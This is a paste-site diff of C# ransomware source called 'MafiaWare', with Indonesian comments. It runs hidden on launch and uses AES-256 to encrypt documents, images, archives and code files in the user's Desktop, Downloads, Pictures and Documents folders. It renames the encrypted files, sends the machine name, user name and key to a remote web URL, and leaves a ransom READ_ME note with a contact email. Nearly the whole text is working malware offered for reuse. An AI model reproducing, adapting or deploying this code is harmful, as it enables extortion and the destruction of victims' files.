SHOW:
|
|
- or go back to the newest paste.
1 | /* | |
2 | * | |
3 | - | * MAFIAWARE |
3 | + | * RANSOMWARE |
4 | * Algorithm from HT, with C Sources | |
5 | * Encrypt with AES256 | |
6 | - | * contact email : cyberking@indonesianbacktrack.or.id |
6 | + | |
7 | - | * Indonesian Backtrack Team ( http://indonesianbacktrack.or.id/forum ) |
7 | + | |
8 | ||
9 | using System; | |
10 | using System.Diagnostics; | |
11 | using System.Collections.Generic; | |
12 | using System.ComponentModel; | |
13 | using System.Data; | |
14 | using System.Drawing; | |
15 | using System.Linq; | |
16 | using System.Text; | |
17 | using System.Threading.Tasks; | |
18 | using System.Windows.Forms; | |
19 | using System.Security; | |
20 | using System.Security.Cryptography; | |
21 | using System.IO; | |
22 | using System.Net; | |
23 | using Microsoft.Win32; | |
24 | using System.Runtime.InteropServices; | |
25 | using System.Text.RegularExpressions; | |
26 | ||
27 | namespace mafiaware { | |
28 | public partial class Form1 : Form { | |
29 | //Web untuk Password Unlock nya | |
30 | string webPass = "https://yourweb.com/cyberking/w00t.php?g0ttrap="; | |
31 | string namaUser = Environment.UserName; | |
32 | string namaKompi = System.Environment.MachineName.ToString(); | |
33 | string dirUsr = "C:\\Users\\"; //folder User | |
34 | // bisa di coba ke folder system32 | |
35 | //string dirSystm = "C:\\Windows\\"; <-- folder Windows di targetkan ke system32 di ubah/tambah bagian fungsi ngencrypt nya | |
36 | ||
37 | public Form1() { | |
38 | InitializeComponent(); | |
39 | } | |
40 | private void Form1_Load(object sender, EventArgs e) { | |
41 | Opacity = 0; | |
42 | this.ShowInTaskbar = false; | |
43 | ngeEnrypt(); //mulai ngencrypt nya pas loading | |
44 | ngeEnrypt2(); | |
45 | ngeEnrypt3(); | |
46 | ngeEnrypt4(); | |
47 | } | |
48 | private void Form_Shown(object sender, EventArgs e) { | |
49 | Visible = false; | |
50 | Opacity = 100; | |
51 | } | |
52 | ||
53 | //Algo encrypt AES256 | |
54 | public byte[] AES_Encrypt(byte[] bytesToBeEncrypted, byte[] passwordBytes) { | |
55 | byte[] encryptedBytes = null; | |
56 | byte[] saltBytes = new byte[] { 1, 2, 3, 4, 5, 6, 7, 8 }; | |
57 | using (MemoryStream ms = new MemoryStream()) { | |
58 | using (RijndaelManaged AES = new RijndaelManaged()) { | |
59 | AES.KeySize = 256; | |
60 | AES.BlockSize = 128; | |
61 | var key = new Rfc2898DeriveBytes(passwordBytes, saltBytes, 1000); | |
62 | AES.Key = key.GetBytes(AES.KeySize / 8); | |
63 | AES.IV = key.GetBytes(AES.BlockSize / 8); | |
64 | AES.Mode = CipherMode.CBC; | |
65 | using (var cs = new CryptoStream(ms, AES.CreateEncryptor(), CryptoStreamMode.Write)) { | |
66 | cs.Write(bytesToBeEncrypted, 0, bytesToBeEncrypted.Length); | |
67 | cs.Close(); | |
68 | } | |
69 | encryptedBytes = ms.ToArray(); | |
70 | } | |
71 | } | |
72 | return encryptedBytes; | |
73 | } | |
74 | ||
75 | //buat randompass encrypt | |
76 | public string BuatPass(int length) { | |
77 | const string valid = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890*!=&?&/"; | |
78 | StringBuilder res = new StringBuilder(); | |
79 | Random rnd = new Random(); | |
80 | while (0 < length--){ | |
81 | res.Append(valid[rnd.Next(valid.Length)]); | |
82 | } | |
83 | return res.ToString(); | |
84 | } | |
85 | ||
86 | //ngirim pass hasil trap ke web | |
87 | public void ngirimPass(string password){ | |
88 | string g0ttrap = namaKompi + "-" + namaUser + " " + password; | |
89 | var fullUrl = webPass + g0ttrap; | |
90 | var conent = new System.Net.WebClient().DownloadString(fullUrl); | |
91 | } | |
92 | ||
93 | //ngencrypt file | |
94 | public void ngencryptFile(string file, string password) { | |
95 | byte[] bytesToBeEncrypted = File.ReadAllBytes(file); | |
96 | byte[] passwordBytes = Encoding.UTF8.GetBytes(password); | |
97 | ||
98 | //ngehash pass dg sha256 | |
99 | passwordBytes = SHA256.Create().ComputeHash(passwordBytes); | |
100 | byte[] bytesEncrypted = AES_Encrypt(bytesToBeEncrypted, passwordBytes); | |
101 | File.WriteAllBytes(file, bytesEncrypted); | |
102 | System.IO.File.Move(file, file+".hfz"); //ekstensi hasil ngencrypt | |
103 | } | |
104 | - | System.IO.File.Move(file, file+".Locked-Mafiaware"); //ekstensi hasil ngencrypt |
104 | + | |
105 | //ngencrypt folder | |
106 | public void ngencryptFolder(string location, string password) { | |
107 | //ekstensi yang mau di encrypt | |
108 | var validExtensions = new[] { | |
109 | ".txt", ".doc", ".odt", ".jpg", ".png", ".csv", ".sql", ".mdb", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".sln", ".php", ".asp", ".aspx", ".html", ".xml", ".psd", ".zip", ".rar" | |
110 | }; | |
111 | ||
112 | string[] files = Directory.GetFiles(location); | |
113 | string[] childDirectories = Directory.GetDirectories(location); | |
114 | for (int i = 0; i < files.Length; i++){ | |
115 | string extension = Path.GetExtension(files[i]); | |
116 | if (validExtensions.Contains(extension)) | |
117 | { | |
118 | ngencryptFile(files[i],password); | |
119 | } | |
120 | } | |
121 | for (int i = 0; i < childDirectories.Length; i++){ | |
122 | ngencryptFolder(childDirectories[i],password); | |
123 | } | |
124 | } | |
125 | public void ngeEnrypt() { | |
126 | string password = BuatPass(15); | |
127 | string path = "\\Desktop"; | |
128 | string startPath = dirUsr + namaUser + path; | |
129 | ngirimPass(password); | |
130 | ngencryptFolder(startPath,password); | |
131 | pesanReadMe(); | |
132 | password = null; | |
133 | System.Windows.Forms.Application.Exit(); | |
134 | } | |
135 | public void ngeEnrypt2() { | |
136 | string password = BuatPass(15); | |
137 | string path = "\\Downloads"; | |
138 | string startPath = dirUsr + namaUser + path; | |
139 | ngirimPass(password); | |
140 | ngencryptFolder(startPath,password); | |
141 | password = null; | |
142 | System.Windows.Forms.Application.Exit(); | |
143 | } | |
144 | public void ngeEnrypt3() { | |
145 | string password = BuatPass(15); | |
146 | string path = "\\Pictures"; | |
147 | string startPath = dirUsr + namaUser + path; | |
148 | ngirimPass(password); | |
149 | ngencryptFolder(startPath,password); | |
150 | password = null; | |
151 | System.Windows.Forms.Application.Exit(); | |
152 | } | |
153 | ||
154 | //ngencrypt 4 bagian document, jika ada folder music / shortcut music, itu ga bakal kena, perbedaan auth | |
155 | public void ngeEnrypt4() { | |
156 | - | //ngencrypt 4 bagian document, jika ada folder music / shortcut music, itu ga bakal kena, perbedaan auth :p akalin sendiri utk lebih jelas |
156 | + | |
157 | string path = "\\Documents"; | |
158 | string startPath = dirUsr + namaUser + path; | |
159 | ngirimPass(password); | |
160 | ngencryptFolder(startPath,password); | |
161 | password = null; | |
162 | System.Windows.Forms.Application.Exit(); | |
163 | } | |
164 | //Pesanini diletakkan di folder desktop ( bisa di ubah atau di tambah lokasi nya, edit di bagian fungsi ngencrypt ) | |
165 | public void pesanReadMe() { | |
166 | string path = "\\Desktop\\READ_ME.txt"; | |
167 | string fullpath = dirUsr + namaUser + path; | |
168 | string[] lines = { "Cyberking was Encrypt your File with MafiaWare", "Email me and meet me", "my email cyberking@indonesianbacktrack.or.id" }; | |
169 | System.IO.File.WriteAllLines(fullpath, lines); | |
170 | } | |
171 | } | |
172 | } |